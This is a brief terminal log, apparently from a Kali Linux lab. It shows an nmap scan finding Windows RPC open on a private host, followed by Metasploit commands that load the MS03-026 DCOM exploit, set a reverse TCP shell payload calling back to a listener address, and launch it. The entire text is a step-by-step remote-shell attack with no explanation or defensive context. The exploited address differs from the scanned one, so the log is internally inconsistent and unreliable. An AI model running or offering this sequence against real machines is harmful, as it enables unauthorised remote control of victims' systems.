root@kali:~# nmap -A -sV 192.168.1.5
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-23 21:33 EDT
Nmap scan report for 192.168.1.5
Host is up (0.00016s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
msf > search dcom
msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(windows/dcerpc/ms03_026_dcom) > set RHOST 192.168.1.7
msf exploit(windows/dcerpc/ms03_026_dcom) > show payloads
msf exploit(windows/dcerpc/ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(windows/dcerpc/ms03_026_dcom) > show options
msf exploit(windows/dcerpc/ms03_026_dcom) > set LHOST 192.168.1.9
LHOST => 192.168.1.9
msf exploit(windows/dcerpc/ms03_026_dcom) > exploit